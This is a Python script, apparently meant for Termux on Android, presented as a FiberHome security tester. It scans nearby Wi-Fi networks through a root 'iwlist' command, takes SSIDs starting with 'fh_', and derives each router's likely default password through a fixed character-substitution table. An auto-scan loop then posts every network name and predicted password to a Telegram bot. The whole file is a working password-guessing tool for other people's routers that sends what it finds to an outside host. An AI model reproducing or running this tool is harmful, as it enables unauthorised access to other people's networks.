# -*- coding: utf-8 -*-
# -----------------------------------------------------------------------
# Coded By: Moha Al-Shalfawi (Chlef-02)
# Project: FH-Algeria Smart Tester (Drakola Edition)
# -----------------------------------------------------------------------

import os
import subprocess
import requests
import time
import json

# --- إعدادات التلجرام (ضع بياناتك هنا) ---
TOKEN = "YOUR_BOT_TOKEN"
CHAT_ID = "YOUR_CHAT_ID"

# جدول التبديل الخاص بـ FH من صورتك الأولى
MAPPING = {
    'e': '1', 'd': '2', 'c': '3', 'b': '4',
    'a': '5', '9': '6', '8': '7', 'f': '0',
    '1': 'e', '2': 'd', '3': 'c', '4': 'b',
    '5': 'a', '6': '9', '7': '8', '0': 'f'
}

def clear():
    os.system("clear")

def banner():
    print("\033[1;32m")
    print(r"""
 ██████╗ ██████╗  █████╗ ██╗  ██╗ ██████╗ ██╗      █████╗ 
 ██╔══██╗██╔══██╗██╔══██╗██║ ██╔╝██╔═══██╗██║     ██╔══██╗
 ██║  ██║██████╔╝███████║█████╔╝ ██║   ██║██║     ███████║
 ██║  ██║██╔══██╗██╔══██║██╔═██╗ ██║   ██║██║     ██╔══██║
 ██████╔╝██║  ██║██║  ██║██║  ██╗╚██████╔╝███████╗██║  ██║
 ╚═════╝ ╚═╝  ╚═╝╚═╝  ╚═╝╚═╝  ╚═╝ ╚═════╝ ╚══════╝╚═╝  ╚═╝
    """)
    print("\033[1;33m      [+] Smart Security Tool For FiberHome (FH) [+]")
    print("\033[1;32m      [+] Coded By: Moha (Chlef-02) | 2026        [+]")
    print("\033[1;37m-------------------------------------------------------")

def get_predicted_pass(ssid):
    if "fh_" in ssid.lower():
        suffix = ssid.split("fh_")[-1]
        return "wlan" + "".join([MAPPING.get(c.lower(), c) for c in suffix])
    return None

def send_telegram(msg):
    requests.post(f"https://api.telegram.org/bot{TOKEN}/sendMessage", data={"chat_id": CHAT_ID, "text": msg, "parse_mode": "Markdown"})

def scan_auto():
    print("\033[1;34m[*] جاري البحث عن الشبكات القريبة... (يرجى الانتظار)")
    ssids = []
    try:
        # محاولة سحب الشبكات عبر Termux (يتطلب روت أو Termux-API)
        cmd = "su -c 'iwlist wlan0 scanning | grep ESSID'"
        output = subprocess.check_output(cmd, shell=True).decode('utf-8')
        for line in output.split('\n'):
            if "ESSID" in line:
                name = line.split('"')[1]
                if name.strip(): ssids.append(name.strip())
    except:
        return []
    return list(set(ssids))

def main():
    clear()
    banner()
    print("\033[1;32m(1) \033[1;37mAuto-Scan (المسح التلقائي وإرسال لتلجرام)")
    print("\033[1;32m(2) \033[1;37mManual Mode (إدخال اسم الشبكة يدوياً)")
    print("\033[1;32m(3) \033[1;37mWPS Check (خاصية تجريبية)")
    print("\033[1;32m(0) \033[1;37mExit")
    print("\033[1;37m-------------------------------------------------------")
    
    choice = input("\033[1;32m[#] Enter Choice: ")
    
    if choice == "1":
        sent = []
        while True:
            found = scan_auto()
            for s in found:
                if "fh_" in s.lower() and s not in sent:
                    p = get_predicted_pass(s)
                    if p:
                        print(f"\033[1;32m[+] Found: {s} | Pass: {p}")
                        msg = f"🚀 Target Detected: {s}\n🔑 Predicted Pass: {p}"
                        send_telegram(msg)
                        sent.append(s)
            time.sleep(15)
            
    elif choice == "2":
        ssid = input("\033[1;33m[?] ادخل اسم الشبكة (مثال: fh_5d620): ")
        pw = get_predicted_pass(ssid)
        if pw:
            print(f"\n\033[1;32m[+] كلمة السر المتوقعة هي: \033[1;37m{pw}")
            send_telegram(f"📡 Manual: {ssid}\n🔑 Pass: {pw}")
        else:
            print("\033[1;31m[-] الاسم لا يتبع نمط FiberHome.")
            
    elif choice == "3":
        print("\033[1;33m[!] هذه الخاصية قيد التطوير في نسخة Drakola v2.")
        
    elif choice == "0":
        print("\033[1;32mGoodbye Moha!")
        exit()

if __name__ == "__main__":
    main()
